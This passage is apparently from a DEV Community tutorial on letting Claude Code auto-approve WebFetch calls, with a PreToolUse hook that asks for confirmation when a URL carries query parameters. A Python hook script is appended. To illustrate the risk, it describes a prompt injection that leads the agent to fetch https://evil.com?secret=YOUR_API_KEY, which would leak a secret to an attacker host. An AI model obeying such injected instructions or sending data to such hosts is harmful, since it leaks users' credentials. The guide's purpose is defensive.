Claude Code: Auto-Approve Tools While Keeping a Safety Net with Hooks

Source: DEV Community
Every time Claude Code fetches a URL, it asks for permission. After the 50th approval for a docs page, you start wondering — can I just auto-allow this?

You can. But there's a catch: WebFetch can send data in query parameters. A prompt injection buried in a file could trick Claude into fetching https://evil.com?secret=YOUR_API_KEY. Auto-approving everything means you'd never see it happen.

Here's how I set up a middle ground: auto-allow clean URLs, but show a confirmation prompt when query parameters are present.

The naive approach (don't do this)

You might think adding WebFetch to permissions is enough:

    // ~/.claude/settings.json
    {
      "permissions": {
        "allow": ["WebFetch"]
      }
    }

This works — but it auto-allows everything, including https://evil.com?token=abc123. No safety net.

The hook approach (do this instead)

Claude Code has a PreToolUse hook system. A hook runs before every tool call and can:

- Exit 0 — silently allow (no prompt)
- Exit 1 — show a message and ask for confirmation (approve/
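The check described above (allow a clean URL, prompt when query parameters are present) could be written as the hook script below; this is an added example, not the article's own script. It goes slightly further than the text by also prompting for URLs that are not plain http(s) or that carry credentials before the host name. Assumptions: the exit codes mean what the article says, the hook receives the pending tool call as JSON on stdin with the fields `tool_name` and `tool_input.url`, and the names `review_url`, `ALLOW` and `ASK` are made up for this sketch.

```python
#!/usr/bin/env python3
# Added example, not the article's script: PreToolUse check for WebFetch URLs.
import json
import sys
from urllib.parse import parse_qsl, urlsplit

ALLOW, ASK = 0, 1  # exit codes with the meaning the article gives them


def review_url(url):
    """Return (exit_code, reason); anything unusual falls through to ASK."""
    if not isinstance(url, str):
        return ASK, "no URL string in the tool input"
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return ASK, "URL could not be parsed"
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return ASK, "not a plain http(s) URL"
    if parts.username or parts.password:
        return ASK, "URL carries credentials before the host name"
    if parts.query:
        # Name the parameters but not their values, so a leaked secret
        # is not copied into the hook's own output.
        pairs = parse_qsl(parts.query, keep_blank_values=True)
        names = ", ".join(name for name, _ in pairs) or "(unnamed)"
        return ASK, f"query parameters sent to {parts.hostname}: {names}"
    return ALLOW, ""


def main():
    # Assumption: the pending tool call arrives as JSON on stdin with the
    # tool name in "tool_name" and the URL in "tool_input"["url"].
    try:
        event = json.load(sys.stdin)
    except ValueError:
        event = None
    if not isinstance(event, dict) or event.get("tool_name") != "WebFetch":
        # Never silently allow a call this hook was not written for.
        print("webfetch hook: unexpected hook input", file=sys.stderr)
        return ASK
    tool_input = event.get("tool_input")
    url = tool_input.get("url") if isinstance(tool_input, dict) else None
    code, reason = review_url(url)
    if code != ALLOW:
        print(f"webfetch hook: {reason}", file=sys.stderr)
    return code


if __name__ == "__main__":
    sys.exit(main())
```

Every failure path ends in the prompt rather than in a silent allow, so malformed input or a hook wired to the wrong tool costs an extra confirmation instead of an unseen request.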